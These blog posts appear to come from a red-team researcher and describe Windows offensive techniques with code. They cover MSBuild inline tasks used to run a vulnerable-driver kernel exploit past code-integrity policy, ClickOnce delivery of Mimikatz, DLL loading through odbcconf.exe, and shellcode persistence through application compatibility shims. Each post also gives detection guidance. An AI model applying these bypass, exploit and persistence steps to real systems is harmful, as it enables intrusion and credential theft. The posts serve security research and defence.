Monday, January 16, 2017

Attacking Drivers With MSBuild.exe

I’ve recently been experimenting with the full offensive capabilities of MSBuild.exe. For reference, MSBuild.exe ships with the .NET Framework and is installed by default on Windows 10.


The MSBuild documentation describes the feature this way: “Starting in .NET Framework version 4, you can create tasks inline in the project file. You do not have to create a separate assembly to host the task. This makes it easier to keep track of source code and easier to deploy the task. The source code is integrated into the script.”


Specifically, the aspect of MSBuild.exe that we are leveraging is called an Inline Task.
This feature allows us to specify C# code in an XML project file that is compiled and executed in memory when the project is built. Because the compiled assembly is loaded as a byte array in memory, it will likely not be picked up by tools that monitor library loads from disk, such as Application Whitelisting or antivirus. Really, if you think about it, this is every bit as powerful as PowerShell, without all the logging and detection that comes with PowerShell these days. By leveraging pure C#, you can avoid PowerShell logging.
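To make the mechanics concrete, here is a minimal sketch of an inline task project file; the file name, task name, and console message are placeholders of mine, not the PoC referenced in this post. Saved as hello.xml, it would run with: MSBuild.exe hello.xml

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <HelloTask />
  </Target>
  <UsingTask TaskName="HelloTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;

          public class HelloTask : Task
          {
              public override bool Execute()
              {
                  // Arbitrary C# runs here; MSBuild compiles it and loads the
                  // resulting assembly from memory rather than from disk.
                  System.Console.WriteLine("Hello from an inline task");
                  return true;
              }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>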
This idea led me to explore the full potential of using MSBuild.exe for bypassing UMCI (User Mode Code Integrity). For example, to expand our influence on the local system, we could exploit a locally installed, approved, but vulnerable driver. Normally, a user-mode process is used to interact with the driver and kick off the exploit. However, with UMCI in place, your PoC binary won’t execute and you are stuck. This post describes the details and methods you can call to interact with the driver using the .NET Framework, hosted inside MSBuild.exe.
If you would like to review the code sample, I’ve posted it here.
First, a bit of background on the driver and the exploit technique. I stumbled upon this driver on GitHub a couple of weeks ago. All the research on this exploit was done by Shahriyar Jalayeri (@ponez).
I wanted to see if I could port the exploit to C# so that I could use MSBuild.exe to execute it. And the answer is yes, yes you can ;-).
In this example, we are going to exploit a write-what-where vulnerability. This means we can write an attacker-controlled value (the “what”) to an attacker-controlled address (the “where”) in kernel memory. The question is, how do we identify the “what” and the “where”? There is an excellent book here that provided a lot of the background for me.
A couple of preliminary steps:
First, we need to locate the base address of ntoskrnl.exe. This can be done using the following routine here. All of this can be done as a normal user. As my colleague Matt Graeber (@mattifestation) pointed out, this is a fantastic heuristic for a Sysmon rule: detection of any PID besides 4 (the System process) that loads ntoskrnl.exe. There is no legitimate purpose for this; it is almost certainly malicious.
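The exact routine is in the linked sample; as an illustration of the general approach, one common way to leak the kernel base from user mode is EnumDeviceDrivers in psapi.dll, whose first returned image base is conventionally ntoskrnl.exe. A rough C# sketch (the names and structure are mine):

using System;
using System.Runtime.InteropServices;

public static class KernelBase
{
    [DllImport("psapi.dll", SetLastError = true)]
    static extern bool EnumDeviceDrivers(
        [Out] IntPtr[] driverBases, uint arraySizeBytes, out uint bytesNeeded);

    public static IntPtr Get()
    {
        uint needed;
        // First call asks how many bytes of pointers are required.
        EnumDeviceDrivers(null, 0, out needed);

        IntPtr[] bases = new IntPtr[needed / IntPtr.Size];
        if (!EnumDeviceDrivers(bases, (uint)(bases.Length * IntPtr.Size), out needed))
            throw new InvalidOperationException("EnumDeviceDrivers failed");

        // The first image base returned is conventionally ntoskrnl.exe.
        return bases[0];
    }
}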


Second, once we have the base address of the kernel, we need to locate the offsets of important structures and functions. Here, we load ntoskrnl.exe into our own process so that we can calculate the offsets and the values we need to overwrite.


“After discovering the correct base address of the Kernel Executive, we will be able to relocate whichever exported function we’d like to move by simply loading the same binary image in user land and relocating the relative virtual address (RVA) using the real kernel base address leaked by that function. Do not confuse RVAs with virtual memory addresses. An RVA is a virtual address of an object (a symbol) from the binary file after being loaded into memory, minus the actual base address of the file image in memory. To convert an RVA to the corresponding virtual address, we have to add the RVA to the corresponding module image base address. The procedure to relocate Kernel Executive functions, hence, is straightforward. We have to load the kernel image into user-mode address space via the LoadLibrary() API, and then pass the HMODULE handle to a function which resolves the RVA…” - A Guide to Kernel Exploitation, p. 276.
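In C#, that procedure looks roughly like the sketch below: map ntoskrnl.exe into our own process, take GetProcAddress of the export we care about, subtract the user-mode module base to get the RVA, and add the RVA to the leaked kernel base. This illustrates the book's procedure and is not the exact code from the sample:

using System;
using System.Runtime.InteropServices;

public static class KernelOffsets
{
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr LoadLibraryEx(string fileName, IntPtr file, uint flags);

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr GetProcAddress(IntPtr module, string procName);

    const uint DONT_RESOLVE_DLL_REFERENCES = 0x00000001;

    // Returns the kernel-mode virtual address of an ntoskrnl export,
    // given the real kernel base leaked earlier.
    public static IntPtr Resolve(IntPtr kernelBase, string exportName)
    {
        IntPtr userModeNt = LoadLibraryEx(
            @"C:\Windows\System32\ntoskrnl.exe", IntPtr.Zero, DONT_RESOLVE_DLL_REFERENCES);
        if (userModeNt == IntPtr.Zero)
            throw new InvalidOperationException("Could not map ntoskrnl.exe");

        IntPtr userModeAddr = GetProcAddress(userModeNt, exportName);
        long rva = userModeAddr.ToInt64() - userModeNt.ToInt64();   // RVA = VA - image base
        return new IntPtr(kernelBase.ToInt64() + rva);              // rebase onto the real kernel
    }
}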


Ok. Now we need to actually perform the overwrite. This is done by interacting with the driver and passing a malicious request that overwrites the location we identified.


This is seen here.  
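The linked code has the specifics; the general shape of that interaction from C# is CreateFile on the driver's symbolic link followed by DeviceIoControl with the vulnerable IOCTL. The device name, IOCTL code, and buffer layout below are placeholders of mine, not the real values for this driver:

using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class DriverClient
{
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern SafeFileHandle CreateFile(string fileName, uint access, uint share,
        IntPtr security, uint creationDisposition, uint flags, IntPtr template);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(SafeFileHandle device, uint ioControlCode,
        byte[] inBuffer, int inBufferSize, byte[] outBuffer, int outBufferSize,
        out int bytesReturned, IntPtr overlapped);

    const uint GENERIC_READ = 0x80000000;
    const uint GENERIC_WRITE = 0x40000000;
    const uint OPEN_EXISTING = 3;
    const uint IOCTL_VULN_WRITE = 0x22200B;   // hypothetical IOCTL code

    public static void SendOverwrite(byte[] request)
    {
        // Placeholder symbolic link -- substitute the vulnerable driver's device name.
        using (SafeFileHandle device = CreateFile(@"\\.\VulnerableDevice",
            GENERIC_READ | GENERIC_WRITE, 0, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero))
        {
            if (device.IsInvalid)
                throw new InvalidOperationException("Could not open device");

            int returned;
            // The request buffer carries the "what" and the "where"; its layout
            // depends entirely on how the driver interprets its input.
            DeviceIoControl(device, IOCTL_VULN_WRITE, request, request.Length,
                null, 0, out returned, IntPtr.Zero);
        }
    }
}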


I ended up just writing a bunch of shellcode consisting of NOP instructions and 0xCC (INT 3) breakpoints. I leave it to you to experiment and see what kind of interesting exploit you can come up with; my code is a simple POC. Be sure to check out https://www.fuzzysecurity.com/ for some cool exploits written in PowerShell, much of which can be ported to .NET easily.


Ok. So, what does this all mean? Well, I’m an advocate of Application Whitelisting, and one of the reasons for exploring this area was to demonstrate that a validly signed but vulnerable driver can undermine your local systems. An attacker can bring and install such a driver and use it to load rootkits or other malicious code running in kernel context. The combination of a kernel-mode and user-mode bypass has significant implications.


Device Guard actually has a driver policy referred to as Kernel Mode Code Integrity (KMCI). This allows your organization to approve specific drivers; even if a driver is signed, you can prevent it from being loaded on your systems. It is important to have a UMCI policy, and it is just as important to consider a KMCI policy as well. Drivers should be far less dynamic in your environment: you should know EXACTLY which drivers are deployed, and their versions. A good reference on that is here and on Matt’s blog.


That’s all I have today.




Casey
@subTee



Thursday, January 12, 2017

Consider Application Whitelisting with Device Guard

A while back, I posted this question on Twitter.


I realize that Twitter is a difficult medium for articulating full discussions, so I wanted to engage the topic with a blog post. Over the last couple of years, I have focused a fair amount of time on drawing attention to the use/misuse of trusted binaries to circumvent Application Whitelisting (AW) controls. What I have not often discussed is the effectiveness of AW that I have seen in practice. I would like to take the time to describe what I see as the strengths of AW, and encourage organizations to consider whether it might work for their environments.
The genesis of this discussion came from my colleague, Matt Graeber (@mattifestation).  We’ve spent a fair amount of time looking at this technology as it applies to Microsoft’s Device Guard. And while we agree there are bypasses, we also believe that a tool like Device Guard can dramatically reduce the attack surface and tools available to an adversary.
One question you must ask yourself and your organization is this… How long will you allow the adversary to use EXE/DLL tradecraft to persist and operate in your environment? I have heard a great deal of discussion and resistance to deploying AW. However, I personally have not heard anyone who has deployed the technology say that they regret whitelisting.
When the organization I used to work for deployed AW in 2013, it freed our team from several tasks. It gave us time to hunt and prepare for the more sophisticated adversary. Commodity and targeted attacks take various forms, but one commonality many of them share is dropping an EXE or DLL to disk and executing it. It is this form of attack that you can mitigate with AW. With whitelisting, you force the adversary to retool and find new tradecraft, because unapproved, unknown binaries will not execute…
How long will you continue to perform IR and hunt C2 that is emitted from an unapproved PE file?
Here are some of the common reasons I have heard for NOT implementing AW. There are probably others, but this summarizes many.


1. Aren’t there trivial bypasses? It doesn’t stop all attacks.
2. Too much effort.
3. It doesn’t scale.
I’ll take each of these and express my opinion. I’m open to dialogue on this and if I’m wrong, I would like to hear it and correct course…
1. Aren’t there trivial bypasses to AW? It doesn’t stop all attacks.
There are indeed ways to bypass AW; I have found a few. However, most of the bypasses I have demonstrated require that you have already obtained access to, and can execute commands on, the target system. How does the attacker gain that privilege in the first place if you deny them arbitrary PEs? Most likely it will be through a memory corruption exploit in the browser or another application. How many exploit kits, macros, or tools lead to dropping a binary and executing it? Many do…
Most of the bypasses I have used are rooted in misplaced trust.  Often administrators of AW follow a pattern of “Scan A Gold Image & Approve Everything There”.  As Matt Graeber has pointed out to me several times, this is not the best approach.  There are far too many binaries that are included by default that can be abused. A better approach here is to explicitly trust binaries or publishers of code.  I can’t think of a single bypass that I have discovered that can’t be mitigated by the whitelist itself.  For example, use the whitelist to block regsvr32.exe or InstallUtil.exe.
Don’t fall victim to the Perfect Solution Fallacy.  The fact that AW doesn’t stop all attacks, or the fact that there are bypasses, is no reason to dismiss this as a valid defense.


“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke
AW, in my opinion, can help you get control of the software executing in your environment. It actually gives teeth to those Software Installation Policies. For example, it only takes one person looking for the PuTTY SSH client and downloading a version with a backdoor to cause problems in your network. For an example of how to backdoor PuTTY, see this recent post, or use The Backdoor Factory (BDF). The thing is, the whitelist doesn’t even need to know the file contains a backdoor: the original file has been altered, so it will not pass the approval process and will be denied execution. Only the approved version of PuTTY would be able to execute in your environment.
2. Too much effort.
Well… I’ve heard this, or some variation of it. I understand that deploying and maintaining AW takes tremendous effort if you want to be successful. It will require training multiple people to make approvals and help with new deployments.
You will actually have to work very closely with your client teams, those in IT that manage the endpoints.  These partnerships can only strengthen the security team’s ability to respond to incidents. You can leverage tools like SCCM to assist with AW approvals and deployments.
The level of effort decreases over time. Yes, there will be long hours on the front end: deploying configurations, reviewing audit logs, updating configs, etc. Some admins are so worried they will block something inadvertently that they are paralyzed and never even try. I think you’ll find that, yes, you will block something legitimate. Accept that this will happen; it’s a learning process, so take it in steps and use it as an opportunity to get better.
I’ll say it again; I haven’t met anyone who has made the effort to deploy AW say that they regret the decision…
If you think it’s too hard, why not try 10% of the organization and see what you learn?
Stop telling me you aren’t doing this because it’s too hard… Anything worth doing well is going to require some effort and determination.
3. It doesn’t scale.
Nope, it may not in your environment.  I never said it would… You must decide how far to go.  You may not get AW everywhere, but you can still win with it deployed in critical locations.  The image below describes how I think about how AW applies to different parts of your organization.  It is not a one-size-fits-all solution.  There are approaches and patterns that affect how you will deploy and configure whitelists. I think you should start with the bottom, and work your way up the stack.
Start to think of your environment in terms of how dynamic the systems are. At the low end of the spectrum are fixed-function systems; think of something like an Automated Teller Machine. These often only need to apply patches, and new software rarely lands there. Next, you have various department templates; each department will be unique, but likely fits a pattern. Then come IT admins, who often need to install software to test, or have more dynamic requirements. At the top of the environment are developer workstations, systems that are producing and testing code. I’m not saying you can’t whitelist here. You can, I’ve done it. But it will require some changes to build processes, code signing, etc.


Yes, this is an overly simplified analogy, but I hope it helps you see where you can begin to prioritize AW deployments.
So, begin to reorient how you think about your systems in terms of how dynamic they are. You will have your quickest and earliest wins by starting at the bottom and moving your way up the hierarchy.


Conclusion


I am eager for open debate here. If AW sucks, then let me hear why. Tell me what your experience has been. What would have made it work? I’m interested in solutions that make a real long-term difference in your environment. It is my opinion that AW works, despite some flaws. It can dramatically reduce the attack patterns available to an adversary and increase the noise they generate. I also believe that by implementing AW, your security teams can gain efficiencies in how they operate. I am open to learning here.
If you are tasked with defending your organization, I’m asking you, as you begin to roll out Windows 10, to consider using Device Guard.


Ok, that’s all I have today.  Sincere feedback welcome.  If you think I’m wrong, I’d like to hear why...

Cheers,

Casey
@subTee

Wednesday, December 14, 2016

Mimikatz Delivery via ClickOnce with URL Parameters

Recently, during an ATD team hackathon, we split our team into groups and attacked different problems. The challenge that @webyeti and I took on was to write a quick POC proving the ability to pass URL parameters to a ClickOnce application.

This has the advantage of customizing the implant at the time the user clicks to install the application. For background on ClickOnce as a phishing payload, see the following:


One of the challenges with ClickOnce is having to use Visual Studio to compile each payload for the target. By leveraging URL Parameters, you can build a base download cradle that contains custom logic based on the actual request that was made. This means you can easily customize payloads without having to recompile them.

The ability to pass input to the ClickOnce Deployment is well-documented here:

So let’s look at an example. In this example, we will download and execute an encrypted version of Mimikatz. This is just a basic example to highlight the capabilities of this tactic. Passing a key in the URL parameter is a bad idea, since a well-trained defender could extract the key from a proxy log or the registry. But I think this technique provides enough opportunity for unique key material per payload.

First, you will need to create the Visual Studio application and configure it to be published as a ClickOnce application.

Second, when you host the application on a web server, you will need to set up the correct MIME types to trigger the ClickOnce app.

Setting up the right MIME types is well-documented here:

.application –> application/x-ms-application 
.manifest –> application/x-ms-manifest 
.deploy –> application/octet-stream

The code to parse and process the URL Parameters is really simple.
Request:  http://www.example.com/s.application?field1=value1&field2=value2&field3=value3
Then your app can call:
string queryString = ApplicationDeployment.CurrentDeployment.ActivationUri.Query;
This will retrieve the Query string.
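A minimal sketch of pulling individual values out of that query string, assuming a reference to System.Deployment and that the ClickOnce publish options allow URL parameters to be passed to the application (the parameter names follow the example request above):

using System;
using System.Collections.Generic;
using System.Deployment.Application;

static class UrlParams
{
    public static Dictionary<string, string> Get()
    {
        var result = new Dictionary<string, string>();
        if (!ApplicationDeployment.IsNetworkDeployed ||
            ApplicationDeployment.CurrentDeployment.ActivationUri == null)
            return result;   // launched locally, or URL parameters not enabled

        // e.g. "?field1=value1&field2=value2&field3=value3"
        string query = ApplicationDeployment.CurrentDeployment.ActivationUri.Query.TrimStart('?');
        foreach (string pair in query.Split(new[] { '&' }, StringSplitOptions.RemoveEmptyEntries))
        {
            string[] kv = pair.Split(new[] { '=' }, 2);
            result[Uri.UnescapeDataString(kv[0])] =
                kv.Length > 1 ? Uri.UnescapeDataString(kv[1]) : string.Empty;
        }
        return result;
    }
}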

There are numerous examples of being able to customize your delivery based on inputs from the URL parameters.  I leave it to you to experiment with other ways to leverage this tactic.

Here is a brief Demo:




POC Gist:

From a defensive perspective, there will be a number of artifacts stored in the registry. Each ClickOnce application leaves a tattoo of its settings, including the initial URL requested, under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, with a per-app dynamic key generated.
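To sweep for those artifacts, a small C# sketch that walks the per-user Uninstall key and prints any string value containing a URL might look like the following; the heuristic and output format are mine, not from the original post:

using System;
using Microsoft.Win32;

static class ClickOnceHunter
{
    static void Main()
    {
        const string uninstall = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall";
        using (RegistryKey root = Registry.CurrentUser.OpenSubKey(uninstall))
        {
            if (root == null) return;
            foreach (string sub in root.GetSubKeyNames())
            {
                using (RegistryKey entry = root.OpenSubKey(sub))
                {
                    foreach (string name in entry.GetValueNames())
                    {
                        string data = entry.GetValue(name) as string;
                        // Flag anything that records a remote deployment URL.
                        if (data != null &&
                            data.IndexOf("http", StringComparison.OrdinalIgnoreCase) >= 0)
                            Console.WriteLine("{0}\\{1}: {2} = {3}", uninstall, sub, name, data);
                    }
                }
            }
        }
    }
}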


Defenders should also consider blocking the .application extension and the other MIME types mentioned above. Seriously... how often will apps legitimately be deployed from outside your network from arbitrary URLs?


That’s all for today.  Hope this was helpful.


Cheers,


Casey
@subTee


Thursday, October 27, 2016

Command Line Camouflage - ODBCCONF.EXE

One of the tools Blue Teams have is combining big data with command-line auditing. So here's something to add some confusion to their game.

Recently I stumbled onto another interesting binary: ODBCCONF.EXE. It's present by default in Windows. We've heard that before.

https://msdn.microsoft.com/en-us/library/ee388579(v=vs.85).aspx

If you look closely, there are two interesting switches: /A and /F.

So we can load an arbitrary DLL; no injection required this way.

odbcconf.exe /A { REGSVR evil.dll }

However, it's much more interesting, in my opinion, to use

odbcconf.exe /F my.anyextension

For example: odbcconf.exe /F sqlserver.config

This will load the dll specified in the sqlserver.config file.
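As I understand the response-file format, it is simply the same action string you would otherwise pass to /A, one action per line, so a sqlserver.config along these lines should do it (the path is illustrative):

REGSVR "C:\Users\Public\evil.dll"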

Recently Nick Tyrer (@NickTyrer) created an interactive PowerShell console using this method.

Pretty fantastic!

https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b



This requires the C# code to be compiled with the Unmanaged-Export capability found here:

https://www.nuget.org/packages/UnmanagedExports
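The export matters because odbcconf's REGSVR action invokes DllRegisterServer in the target DLL, and a managed class library does not expose native exports on its own. A minimal sketch using that package (namespace RGiesecke.DllExport; build for a specific platform such as x86 or x64, not AnyCPU):

using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;   // from the UnmanagedExports NuGet package

public static class Loader
{
    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
    public static int DllRegisterServer()
    {
        // Whatever managed payload you want runs here when odbcconf loads the DLL.
        Console.WriteLine("Loaded via odbcconf REGSVR");
        return 0;   // S_OK
    }
}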

So check it out!

Sometimes all you need is some good camouflage.


That's all for today. Short and sweet.


Cheers,

Casey
@subTee


Thursday, October 13, 2016

Using Application Compatibility Shims

Overview:
There have been a number of blog posts and presentations on Application Compatibility Shims in the past [see References at end]. Application Compatibility is a framework for resolving issues with older applications; however, it has additional use cases that are interesting. For example, EMET is implemented using shims [1,2]. Please see the References section below for additional reading and resources. In short, this document will focus on the following tactics: injecting shellcode via in-memory patches, injecting a DLL into a 32-bit process, and, lastly, detection and shim artifacts. An in-memory patch has an advantage over backdooring an executable on disk: it preserves the file's signature and integrity checks. This technique can also bypass some Application Whitelisting deployments. AppLocker, for example, would allow the startup of a trusted application, and an in-memory patch could then be applied to alter the application.


Shim Installation:
The shim infrastructure is built into the Windows PE loader. Shims can be applied to a process during startup. There is a two-step process that I will refer to as “Match and Patch”. The Match step checks the registry on process creation and looks for a relevant entry. If an entry is found, it further checks the associated .sdb file for additional attributes, for example a version number. Based on my understanding, the .sdb does need to be present on disk; I have not encountered any tactics to load an .sdb file from memory or remotely. When shim databases are installed, they are registered in the registry at the following two locations:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB


These entries can be created manually, using sdb-explorer.exe, or using the built-in tool sdbinst.exe. If you use sdbinst.exe there will also be an entry created in the Add/Remove Programs section. In order to install a shim, you need local administrator privileges.


An example of a shim entry would look like this:
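Roughly, a registered database shows up like this; the GUID, paths, and values are illustrative of how sdbinst registers a database rather than taken from this specific demo:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\notepad.exe
    "{GUID}.sdb" = <install timestamp>

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{GUID}
    DatabaseDescription      = notepad patch
    DatabasePath             = C:\Windows\AppPatch\Custom\{GUID}.sdb
    DatabaseType             = 0x10000
    DatabaseInstallTimeStamp = <filetime>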




Once the shim has been installed, it will be triggered upon each execution of that application. Remember, there is further validation of the executable inside the .sdb file, for example matching a specific version or binary pattern. I have not found a way to apply a shim when a DLL is loaded, or to apply a shim to an already running process. These registry keys, plus the actual .sdb file, are the indicators for the Blue Team that a shim is present.


Shim Creation and Detonation:
There are two tools we can use to create shims: first, the Microsoft-provided Application Compatibility Toolkit (ACT); second, sdb-explorer.exe, created by Jon Erickson. ACT will allow us to inject a DLL into a 32-bit process, while sdb-explorer allows us to create an in-memory binary patch to inject shellcode. ACT has no ability to parse or create an in-memory patch; this can only be done with sdb-explorer.


There is an excellent walk-through here on creating an InjectDLL Demo.


For the remainder of this document, we will focus on using sdb-explorer to create and install an In-Memory patch.


My testing seems to indicate this will not work on Windows 10.  This tactic will only work on Windows versions <= 8.1.  I could be wrong about this, so please share any insight if you have it.


There are two approaches you can take with sdb-explorer. First, you can simply replace or write arbitrary bytes to a region in memory. Second, you can match a block of bytes and overwrite it. There are advantages and disadvantages to both approaches. It is worth noting that this method of persistence will be highly specialized to the environment you are operating in; for example, you will need to know specific offsets in the exact binary version being patched.




For this to work, we need an offset to write our shellcode to. I like to use CFF Explorer.


Here we are going to target the AddressOfEntryPoint. There are other approaches as well. The drawback to this approach is that the application doesn’t actually execute; in order to do that, you would need to execute your patch and then return control to the application. I leave that as an exercise for the reader.


Once we have the offset, we can use the syntax provided by sdb-explorer to write our shellcode into the process at load time.


If we break down the syntax, it is pretty easy to understand.


Line 7. 0x39741 matches the PE Checksum. This is in the PE Header.




Line 8. 0x3689 is the offset of our AddressOfEntryPoint.  What follows is just stock shellcode to execute calc.


Once our configuration file is created, we “compile” it to create the .sdb:
sdb-explorer.exe -C notepad.conf -o notepad.sdb


Then install it:


sdb-explorer.exe -r notepad.sdb -a notepad.exe


You can also use:


sdbinst -p notepad.sdb


In either case it requires local administrative rights to install a shim.


Notepad.exe is nice, but more likely shim targets would be explorer.exe, lsass.exe, dllhost.exe, or svchost.exe: things that give you long-term persistence. Of course, your shellcode would need to return control to the application instead of just hijacking AddressOfEntryPoint.


Shim Detection:
There are two primary indicators that a shim is being used: first, the registry keys mentioned above; second, the presence of the .sdb file. The presence of an .sdb file is not necessarily bad, so it would be wise to build a baseline to understand which shims your organization legitimately uses and which would be an indicator. There was a good example of detecting shim databases given here: Hunting Memory, slide 27. Also, some shim registration activity is recorded in Microsoft-Windows-Application-Experience-Program-Telemetry.evtx.
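As a starting point for a hunt, a small C# sweep of the two registration keys mentioned above could look like this (the output format is mine):

using System;
using Microsoft.Win32;

static class ShimHunter
{
    static void Main()
    {
        string[] keys =
        {
            @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom",
            @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"
        };

        foreach (string path in keys)
        {
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(path))
            {
                if (key == null) continue;   // key absent means no custom shims registered
                foreach (string sub in key.GetSubKeyNames())
                {
                    using (RegistryKey entry = key.OpenSubKey(sub))
                    {
                        Console.WriteLine("{0}\\{1}", path, sub);
                        foreach (string value in entry.GetValueNames())
                            Console.WriteLine("    {0} = {1}", value, entry.GetValue(value));
                    }
                }
            }
        }
    }
}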


Cheers,


Casey
@subTee


References: